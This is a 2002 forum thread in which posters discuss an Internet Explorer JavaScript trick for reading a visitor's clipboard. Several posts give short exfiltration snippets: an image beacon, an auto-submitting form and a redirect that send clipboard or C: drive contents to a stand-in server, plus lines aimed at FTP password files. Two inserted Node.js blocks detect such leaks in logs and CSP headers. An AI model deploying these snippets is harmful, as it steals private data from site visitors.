Now this is just scary


Brian911
12-23-2002, 07:28 AM
http://www.ntfs.org/tmp/clip.html

Microsoft at its best.

merry x-mas
Brian

Undutchable
12-23-2002, 07:31 AM
I don't think it's either scary or surprising...

Aheib
12-23-2002, 07:32 AM
What's so scary about it?
That's JavaScript... JavaScript works client-side.
It's the same trick as showing your C: drive contents in a frame.
You think they can see it, but you're the only one who really can.

Brian911
12-23-2002, 07:35 AM
It's not the same... 'cause you can store it.

Undutchable
12-23-2002, 07:35 AM
Originally posted by Aheib
What's so scary about it?
That's JavaScript... JavaScript works client-side.
It's the same trick as showing your C: drive contents in a frame.
You think they can see it, but you're the only one who really can.

My thoughts exactly

Dusen
12-23-2002, 08:33 AM
That website has no access to your clipboard. As they said, it's client side.

Brian911
12-23-2002, 08:39 AM
Perhaps you got me wrong.
I didn't mean it could change the clipboard or something, but just read it, and that's sick enough.
Step 2: if the clipboard content is displayed in a textbox, you can read it out using Perl/PHP/C/whatever. Now think of paysite passwords, private emails or anything else.
Once you get the content you can actually search the clipboard for "password" triggers, for example.
Or am I wrong on this?

Of course it's client-side, but that doesn't mean it's not a bug; it's a god damn exploit and MS still didn't manage to fix it.

stramm
12-23-2002, 08:42 AM
Doesn't work on my machine...

Aheib
12-23-2002, 08:51 AM
Originally posted by Brian911
Step 2: if the clipboard content is displayed in a textbox, you can read it out using Perl/PHP/C/whatever.
Once you get the content you can actually search the clipboard for "password" triggers, for example.
Or am I wrong on this?
You are wrong, it is impossible to read that with Perl / PHP UNLESS you submit that data. Why else do you think you have to hit a 'reply' button here whenever you make a post? Because a server cannot get the info from the client live.

In other words, it is NOT a god damn exploit, so don't worry :)

Brian911
12-23-2002, 08:53 AM
You don't even have to use a form; just use an image tag like script.cgi?textboxcontent

It's not like I'm an HTML form expert, but there is a way; I saw it earlier. ActiveX might work too...

Aheib
12-23-2002, 08:59 AM
I'm about to give up, bro...
Showing your stats with JavaScript is easy, because it is client-side.
You must understand that HTML is a dead language, meaning it will render and then do nothing. After that, only the user can perform further actions.
The only way to get this to work is to find a way to make the form submit itself.
When you're working with ActiveX apps, you're not using a dead language anymore. But for exploits like those, you should have a firewall that blocks that.

Brian911
12-23-2002, 09:13 AM
I just found the source to send the content, so don't tell me it doesn't work, it does. And it is one hell of an exploit because it can be used in emails and about everything that supports HTML+JScript. Plus it is much easier code than the autobookmark one was back then AND works with standard security settings.

you can give up on me now. ;)

Aheib
12-23-2002, 09:27 AM
Brian, can you hit me up on ICQ? (128185802)
I'd like to take a look at that code...
If what you're saying is true, I can (and will) contact a guy at microsoft I know in order to bring out a patch to fix this....

QuaShe
12-23-2002, 09:34 AM
Aaaaaaaaaaaaaaaaaaaaahhhhhhhhhhh............................... not scary :finger:

scruffy
12-23-2002, 10:29 AM
This is CRAZY...

Big Brother is watching...

Isn't there some type of basic software package that could clear the contents of your clipboard for you on a predetermined time frame?

richard
12-23-2002, 10:49 AM
http://ip-sorter.com/demos/clip/clip.htm

Put something in your clipboard, and click the above link.

Very basic example showing how the data could be passed to the server side.

In this case, it redirects you to a PHP page that echoes the query string. It could do this much more elegantly, without you ever knowing about it.

Aheib
12-23-2002, 11:26 AM
Too bad Richard, but that didn't work.
I had this on my clipboard:
" #!/bin/sh
echo "Content-type: text/plain"
echo
set
"
yet the output was:
Your clipboard was

--------------------------------------------------------------------------------



--------------------------------------------------------------------------------

No data was saved to the server, but it could have been
(tried it with several browsers)
How is this working for others?

Aheib
12-23-2002, 11:30 AM
BTW, Richard, I thought that working with meta tags to get client-side info was one of the oldest tricks in the book.

When I typed that part "The only way to get this to work is to find a way to make the form submit itself."
is when I thought of this one as well...
Not a real danger since it's easy to avoid.

Undutchable
12-23-2002, 12:12 PM
It did display the sentence I had in my clipboard! Perhaps this is more vulnerable than I thought.

richard
12-23-2002, 12:39 PM
Aheib, try again with that text (I did not escape() the clipboard contents).

location.href just proves it can be done; there are many different ways of doing effectively the same thing.

Edit: Too bad, Aheib, but it does work.

slothdog
12-23-2002, 12:49 PM
So correct me if I'm wrong, but that seems kind of useless. I mean, you would first have to hack the site that you wanted to collect info from, second insert your PHP code into their scripts to read the text box (assuming you could even find the section of code that related to the text box you wanted the info from), and third then you have to have that info saved somewhere or emailed somewhere, and somebody's probably going to notice that. I know I would.

Or I guess you could haxor your own paysite :)

richard
12-23-2002, 12:57 PM
Slothdog, yeah, in practice it's not going to be all that great an exploit for 'hacking' paysites.

It's more worrying that your clipboard could be spied on. Perhaps you've got sensitive data on it (like your FTP password or similar); it could be read if you visited a baddy's URL.

Or maybe you've just finished writing an important email or document, and you've had data on the clipboard from that...

Aheib, what about IE's iframe?

http://ip-sorter.com/demos/clip/clipIE.htm

I like Brian's image src method personally :)

richard
12-23-2002, 01:15 PM
http://ip-sorter.com/demos/clip/clip.htm

Try it again...

After it has shown your clipboard, paste your clipboard into notepad or something :-)

0wn3d!

:D

Aheib
12-23-2002, 01:24 PM
Yup, Richard, with the extra escape code it works. Nice job :)
The iframe I was talking about was the <iframe source="c:"></iframe> to show your drive contents.

slothdog
12-23-2002, 01:28 PM
You know what would be funny: switch the clipboard content for some info of your own, like next time somebody went to paste something they got 'hahaha I changed your clipboard' instead :)

richard
12-23-2002, 01:33 PM
Slothdog, I just 0wn0r3d your clipboard :)

Click the link again and check your new clipboard after...

Much0S
12-23-2002, 01:33 PM
Look guys, I don't want to go into a discussion or anything, but EVERYTHING can be read. Also your C: drive or whatever.

It's rather trivial.

<iframe name="oops" src="c:\"></iframe>
location.href="save_the_shit.php?shit=" + document.all["oops"].innerText;

Done.

Brian911
12-23-2002, 02:29 PM
Yep, very close to my approach, Richard. :)

Just found the function to write to the clipboard as well, but I don't like it that much lol

1337 h4x0r u r :D

Aheib
12-23-2002, 03:00 PM
Originally posted by Much0S
Look guys, I don't want to go into a discussion or anything, but EVERYTHING can be read. Also your C: drive or whatever.

It's rather trivial.

<iframe name="oops" src="c:\"></iframe>
location.href="save_the_shit.php?shit=" + document.all["oops"].innerText;
Done.
Not true
http://support.microsoft.com/default.aspx?scid=kb;EN-US;q208427
INFO: Maximum URL Length Is 2,083 Characters in Internet Explorer
Plus, with the limited formatting options URL encoding offers, it's simply not really possible....
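
Added example (not part of the thread or any poster's code): every channel richard and Aheib discuss above pushes the captured text through a request's query string, and a web-server access log records exactly that. The Node.js script below parses constructed Apache combined-format log lines and flags requests whose query string is unusually long (the 2,083-character IE limit Aheib cites caps what one request can carry, so large queries are worth a look), decodes to password-like keywords, or carries a URL with embedded user:pass@ credentials. The endpoints, hosts, IP addresses and log lines are constructed for the demo, and the parsing regex assumes the standard combined log format.

```javascript
// Added example: detect query-string exfiltration in web-server access logs.
// Apache "combined" format:
//   ip ident user [time] "METHOD target HTTP/x" status bytes "referer" "user-agent"
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+) "([^"]*)" "([^"]*)"$/;

// Split one log line into fields; returns null for lines that are not in the format.
function parseLogLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  const [, ip, time, method, target, status, bytes, referer, userAgent] = m;
  const q = target.indexOf('?');
  return {
    ip, time, method, status: Number(status), bytes, referer, userAgent,
    path: q === -1 ? target : target.slice(0, q),
    query: q === -1 ? '' : target.slice(q + 1),
  };
}

// Percent-decode leniently: a truncated or malformed escape must not abort the scan.
function safeDecode(s) {
  try { return decodeURIComponent(s.replace(/\+/g, ' ')); } catch (e) { return s; }
}

// Words that clipboard text of a careless user tends to contain (constructed list).
const CREDENTIAL_WORDS = /\b(password|passwd|passphrase|pwd|secret)\b/i;
// A URL carrying credentials, e.g. ftp://user:pass@host, as an FTP client would copy it.
const EMBEDDED_CREDS = /[a-z][a-z0-9+.-]*:\/\/[^\/\s:@]+:[^\/\s@]+@/i;

// Returns one finding per suspicious request: log line number, client, path and reasons.
function flagExfilRequests(lines, { longQuery = 1024 } = {}) {
  const findings = [];
  lines.forEach((line, index) => {
    const req = parseLogLine(line);
    if (!req || req.query === '') return;
    const decoded = safeDecode(req.query);
    const reasons = [];
    if (req.query.length >= longQuery) reasons.push('long-query');
    if (CREDENTIAL_WORDS.test(decoded)) reasons.push('credential-keyword');
    if (EMBEDDED_CREDS.test(decoded)) reasons.push('embedded-credentials');
    if (reasons.length) {
      findings.push({ line: index + 1, ip: req.ip, path: req.path, referer: req.referer, reasons });
    }
  });
  return findings;
}

// Constructed sample log: a harmless demo request, a plain page view, and three
// requests that should be flagged (keyword, embedded credentials, oversized query).
const UA = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)';
const REF = 'http://demo.example.net/clip.htm';
const SAMPLE_LOG = [
  `203.0.113.5 - - [23/Dec/2002:13:15:02 +0000] "GET /clip.php?c=hello%20world HTTP/1.1" 200 312 "${REF}" "${UA}"`,
  `203.0.113.5 - - [23/Dec/2002:13:16:40 +0000] "GET /clip.php?c=my%20cuteftp%20password%20is%20hunter2 HTTP/1.1" 200 312 "${REF}" "${UA}"`,
  `203.0.113.5 - - [23/Dec/2002:13:17:10 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "${UA}"`,
  `203.0.113.5 - - [23/Dec/2002:13:18:22 +0000] "GET /cgi-bin/track.cgi?ftp%3A%2F%2Fadmin%3AhunterPass%40ftp.example.org HTTP/1.1" 200 43 "${REF}" "${UA}"`,
  `203.0.113.5 - - [23/Dec/2002:13:19:05 +0000] "GET /save.php?d=${'A'.repeat(1900)} HTTP/1.1" 200 43 "${REF}" "${UA}"`,
];

for (const f of flagExfilRequests(SAMPLE_LOG)) console.log(JSON.stringify(f));
```

The keyword list is the weakest of the three checks (it is only as good as the words in it), so in practice the long-query threshold and the embedded-credentials pattern do most of the work; tune `longQuery` to what your own application legitimately sends before alerting on it.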

Due
12-23-2002, 04:57 PM
Originally posted by Aheib

Not true
http://support.microsoft.com/default.aspx?scid=kb;EN-US;q208427
INFO: Maximum URL Length Is 2,083 Characters in Internet Explorer
Plus, with the limited formatting options url encoding offers, it's simply not really possible....
Then just run it through a form uploader thing running in the background or something.
upload.php?file=c:\program files\ftp-program\passwordlist.dat
swap-clipboard ="I just downloaded your password file. thanks"

blind
12-23-2002, 05:01 PM
I mean no offence at all man, but it's really nothing to be afraid of at all..

"THEY" aren't reading your clipboard.

YOU are reading your clipboard.

It's CS, no data is being sent to them... It's a script running on your machine, reading your machine.

Aheib
12-23-2002, 05:24 PM
Originally posted by Due

Then just run it through a form uploader thing running in the background or something.
upload.php?file=c:\program files\ftp-program\passwordlist.dat
swap-clipboard ="I just downloaded your password file. thanks"

You're still gonna need code to have a form submit itself. Using meta tags to refresh with URL variables, well, we all do that. But auto-submitting forms?

rowan
12-23-2002, 05:34 PM
Originally posted by blind
I mean no offence at all man, but it's really nothing to be afraid of at all..

"THEY" aren't reading your clipboard.

YOU are reading your clipboard.

It's CS, no data is being sent to them... It's a script running on your machine, reading your machine.

Haven't you been reading the thread? The content is in a javascript variable, therefore it can easily be passed to a web server...

Aheib
12-23-2002, 06:02 PM
Originally posted by blind
I mean no offence at all man, but it's really nothing to be afraid of at all..

"THEY" aren't reading your clipboard.

YOU are reading your clipboard.

It's CS, no data is being sent to them... It's a script running on your machine, reading your machine.
Blind, I just wrote the code myself as well, and asked a friend to log in on a site of mine.
I actually did store it in a database on my server, and guess what? It worked... he was pretty amazed to hear me tell him what was in his memory.... since we're passing the client-side url variables through the server, you can store them easily....

man, this kinda sucks...

Brian911
12-23-2002, 06:03 PM
Originally posted by Aheib

Blind, I just wrote the code myself as well, and asked a friend to log in on a site of mine.
I actually did store it in a database on my server, and guess what? It worked... he was pretty amazed to hear me tell him what was in his memory.... since we're passing the client-side url variables through the server, you can store them easily....

man, this kinda sucks...

Dude, it was a real good idea not to give up on you. You got it :D

rowan
12-23-2002, 06:04 PM
Originally posted by Aheib
You're still gonna need code to have a form submit itself. Using meta tags to refresh with url variables, well, we all do that. But auto-submitting forms?

document.write('<img src=\"http://someserver.com/cgi-bin/track.cgi?'+escape(ClipboardContentsVar)+'\" width=1 height=1>')

Due
12-23-2002, 06:05 PM
Originally posted by Aheib
You're still gonna need code to have a form submit itself. Using meta tags to refresh with url variables, well, we all do that. But auto-submitting forms?
Set a JavaScript timer and set it to submit the form.
You can submit forms with onblur or onfocus, so why not on a timer?

Aheib
12-23-2002, 06:17 PM
Originally posted by Brian911

Dude, it was a real good idea not to give up on you. You got it :D

Hehe, yes, and I am amazed that they would incorporate something like .clippie
Doesn't work with other browsers though...

Originally posted by Due

Set a javascript timer and set it to submit the form.
you can submit forms with onblur, onfocus so why not on a timer?
Yup, didn't say it wasn't possible, I just said you needed it :)

I'm gonna shoot my man at Microsoft a mail on this one...

Brian911
12-23-2002, 06:20 PM
Originally posted by Aheib
Hehe, yes, and I am amazed that they would incorporate something like .clippie
Doesn't work with other browsers though...

Yup, didn't say it wasn't possible, I just said you needed it :)

I'm gonna shoot my man at Microsoft a mail on this one...

Yeah, but try to sell the info :)

Much0S
12-23-2002, 06:24 PM
Aheib, I mean no disrespect, but you hardly know anything of JavaScript.

You can easily submit automatically. Trust me, the information *is* leaked easily.

<FORM NAME=gnarf METHOD=POST action="eleet_hacker.php">
<INPUT TYPE=HIDDEN NAME=data>
</FORM>

<SCRIPT>
document.all["data"].value = document.all["iframe"].innerText;
document.gnarf.submit();
</SCRIPT>

DONE. Yes, it works.
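
Added example (not part of the thread or any poster's code): the thread lists several ways to get captured text off the machine once it is in a JavaScript variable: an image beacon (rowan), a redirect through location.href (Much0S, richard), an iframe of the local drive, and an auto-submitting form (Much0S, Due). In a current browser, reading the clipboard from a page you merely visit is gated behind user interaction or a permission prompt, so the realistic setting for such a script today is one injected into a site through an XSS hole, and that is the case a Content-Security-Policy header on the site can mitigate. The Node.js code below parses a CSP header and reports which of those channels the policy would block. The page origin https://www.example.com, the policy string, the destination hosts and the channel list are constructed assumptions; the source-expression matcher is a simplified version of the CSP specification's (a host source without a scheme is treated as matching any http(s)/ws(s) URL).

```javascript
// Added example: which exfiltration channels does a given CSP header stop?
const PAGE_ORIGIN = 'https://www.example.com';   // constructed page origin

// Parse "directive src src; directive src" into Map(directive -> [sources]).
// Per the spec, a repeated directive name keeps its first occurrence.
function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    const key = name.toLowerCase();
    if (!policy.has(key)) policy.set(key, sources.map(s => s.toLowerCase()));
  }
  return policy;
}

const DEFAULT_PORT = { 'http:': '80', 'https:': '443', 'ws:': '80', 'wss:': '443' };
const NETWORK_SCHEMES = /^(https?|wss?):$/;

// Does one source expression match a destination URL? Handles 'self', 'none', '*',
// scheme sources (https:, file:) and host sources with optional scheme, leading
// "*." wildcard and port. Simplification: a schemeless host source matches any
// network scheme rather than exactly the page's own scheme.
function sourceMatches(source, url, pageOrigin) {
  if (source === "'none'") return false;
  if (source === "'self'") return url.origin === pageOrigin;
  if (source.startsWith("'")) return false;          // nonces, hashes, other keywords
  if (source === '*') return NETWORK_SCHEMES.test(url.protocol);
  if (/^[a-z][a-z0-9+.-]*:$/.test(source)) return url.protocol === source;
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:\/*]+)(?::(\d+|\*))?$/.exec(source);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  if (scheme ? url.protocol !== scheme + ':' : !NETWORK_SCHEMES.test(url.protocol)) return false;
  if (wildcard ? !url.hostname.endsWith('.' + host) : url.hostname !== host) return false;
  if (port && port !== '*' && (url.port || DEFAULT_PORT[url.protocol]) !== port) return false;
  return true;
}

// Fetch directives fall back to default-src when absent; form-action does not.
const FETCH_DIRECTIVES = new Set(['img-src', 'frame-src', 'child-src', 'script-src',
  'style-src', 'connect-src', 'font-src', 'media-src', 'object-src']);

// Would the policy let a load governed by `directive` reach `destination`?
function cspAllows(policy, directive, destination, pageOrigin = PAGE_ORIGIN) {
  let sources = policy.get(directive);
  if (sources === undefined && directive === 'frame-src') sources = policy.get('child-src');
  if (sources === undefined && FETCH_DIRECTIVES.has(directive)) sources = policy.get('default-src');
  if (sources === undefined) return true;             // nothing in the policy governs this load
  const url = new URL(destination, pageOrigin + '/'); // relative destinations resolve to the page
  return sources.some(s => sourceMatches(s, url, pageOrigin));
}

// The channels proposed in the thread and the directive governing each; null means
// no shipped CSP directive applies (top-level navigation via location.href).
// Destinations are constructed; the thread's file:///C|/ normalizes to file:///C:/.
const CHANNELS = [
  { channel: 'img-beacon',        directive: 'img-src',     destination: 'http://someserver.com/cgi-bin/track.cgi?x' },
  { channel: 'form-same-origin',  directive: 'form-action', destination: 'eleet_hacker.php' },
  { channel: 'form-cross-origin', directive: 'form-action', destination: 'https://collector.example/upload.php' },
  { channel: 'iframe-file',       directive: 'frame-src',   destination: 'file:///C:/' },
  { channel: 'location-redirect', directive: null,          destination: 'http://someserver.com/save.php?x' },
];

function evaluateExfilChannels(header, pageOrigin = PAGE_ORIGIN) {
  const policy = parseCsp(header);
  return CHANNELS.map(c => ({
    channel: c.channel, directive: c.directive, destination: c.destination,
    blocked: c.directive !== null && !cspAllows(policy, c.directive, c.destination, pageOrigin),
  }));
}

const EXAMPLE_POLICY = "default-src 'self'; img-src 'self' https://cdn.example.com; form-action 'self'; frame-src 'self'";

for (const r of evaluateExfilChannels(EXAMPLE_POLICY)) console.log(JSON.stringify(r));
```

Two of the results are the caveats worth remembering: form-action does not fall back to default-src, so `default-src 'none'` on its own still lets an auto-submitted form post anywhere, and no shipped CSP directive governs a top-level navigation, so the location.href channel is reported as not covered rather than blocked; a same-origin form post is also allowed by `form-action 'self'`, which is why the injected-script case still needs the XSS hole itself fixed.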

Zyber
12-23-2002, 06:27 PM
Holy shit, incredible that IE has such a spy function that everyone can exploit...

Unbelievable... and then they go blocking third-party cookies etc. with their privacy protection policy....

crap crap!

Oh, and Merry Christmas to all of you ;-)

Aheib
12-23-2002, 06:28 PM
Originally posted by Much0S
Aheib, I mean no disrespect, but you hardly know anything of JavaScript.
You can easily submit automatically. Trust me, the information *is* leaked easily.
No offense taken, and I hate to quote myself, but
Yup, didn't say it wasn't possible, I just said you needed it
In other words, don't judge my knowledge on incorrect interpretations please :)
But you're right, I'm no JavaScript kiddie. I know just enough to run my sites with it hehe.
C++ and ColdFusion are what I do best.

Undutchable
12-23-2002, 06:32 PM
So you can change someone's clipboard?

You should put your URL in visitors' clipboards when they visit your site :) Nice piece of extra exposure muhaha

Brian911
12-23-2002, 06:35 PM
Originally posted by Undutchable
So you can change someone's clipboard?

You should put your URL in visitors' clipboards when they visit your site :) Nice piece of extra exposure muhaha

ROFL, that's business! I say go for it :rotflmao:
It is so damn easy that every fucking freesite will do it, and I posted it... nooooo ;)

richard
12-23-2002, 06:38 PM
Yep, you can easily change the clipboard's contents :-)

You could easily replace all the letter "a" with letter "e" as well ;-)

BTW: I have XP SP1 installed, and am up-to-date with all the IE patches, and the C:/ iframe does not work, so you can't go phishing for CuteFTP password files on my computer....

Unless there is another way? :)

Aheib
12-23-2002, 06:46 PM
Originally posted by richard
Yep, you can easily change the clipboard's contents :-)

You could easily replace all the letter "a" with letter "e" as well ;-)

BTW: I have XP SP1 installed, and am up-to-date with all the IE patches, and the C:/ iframe does not work, so you can't go phishing for CuteFTP password files on my computer....

Unless there is another way? :)
Which part didn't work? Getting the files to show up in the iframe, or grabbing the contents?
In case of the first, the correct code is this:
<iframe src="file:///C|/" width="500" height="500"></iframe>
I tested it myself with iexplore 6.0x, and it didn't work.
Still works with older versions though.

Much0S
12-23-2002, 08:58 PM
Originally posted by richard

unless there is another way? :)

If I recall correctly this problem is fixed from IE 5.5 service patch #god knows how much onward...

Yes, there are other ways; no, I don't know them currently, but with some thinking it should be possible.

Also it's possible to send your history, if I'm not mistaken...

trip
12-23-2002, 09:03 PM
Guys... with all due respect... this sample exploit is simply NOTHING compared to what some "big boys" know and use...

Sorry, can't say more or I'll have to kill ya' ;)